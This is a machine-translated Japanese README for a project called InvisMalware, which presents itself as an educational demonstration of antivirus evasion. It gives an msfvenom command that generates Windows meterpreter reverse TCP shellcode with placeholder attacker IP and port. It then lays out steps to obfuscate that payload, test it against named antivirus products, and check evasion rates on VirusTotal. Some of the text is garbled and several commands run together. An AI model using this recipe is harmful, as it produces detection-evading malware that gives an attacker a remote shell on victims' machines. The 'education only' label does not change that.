InvisMalware
1.0.0
Invismalwareは、ウイルス対策検出をバイパスする高度なマルウェア回避技術を実証するように設計されたプロジェクトです。この研究駆動型のマルウェア実験は、コード変更やアンチサンドボックス戦略などの難読化方法を利用して、静的および動的マルウェア検出を回避することに焦点を当てています。
このプロジェクトは、悪意のある俳優が使用する回避技術から学ぶことにより、最新のマルウェア防衛戦略に関する洞察を提供することを目的とした教育目的のみを目的としています。
開始するには、リポジトリをクローンし、必要な依存関係をインストールします。
git clone https://github.com/mawg0ud/InvisMalware.git
cd InvisMalwarepip install -r requirements.txtMSFvenomを使用して、逆TCPシェルコードを生成します。
msfvenom -p windows/meterpreter/reverse_tcp LHOST= < your_ip > LPORT= < your_port > -f c > evilexp.cevilexp.cファイルを編集して、コードを難読化し、検出を避けます。
マルウェアを安全で分離した仮想マシンに展開して、その動作をテストし、検出率を測定します。
マルウェアをビルストタルにアップロードして、複数のウイルス対策エンジンにわたって回避率を評価します。
このプロジェクトは、マルウェア回避を達成するために4段階の方法論に従っています。
Kaspersky 、 Windows Defender 、 BitDefenderなどのウイルス対策ソフトウェアを備えた仮想マシンでマルウェアを実行します。
修正されたマルウェアをVirustotalにアップロードし、それを正常に検出するいくつのウイルス対策エンジンを確認します。
プロジェクトを改善するための貢献を歓迎します。貢献したい場合:
このプロジェクトは、MITライセンスの下でライセンスされています。詳細については、ライセンスファイルを参照してください。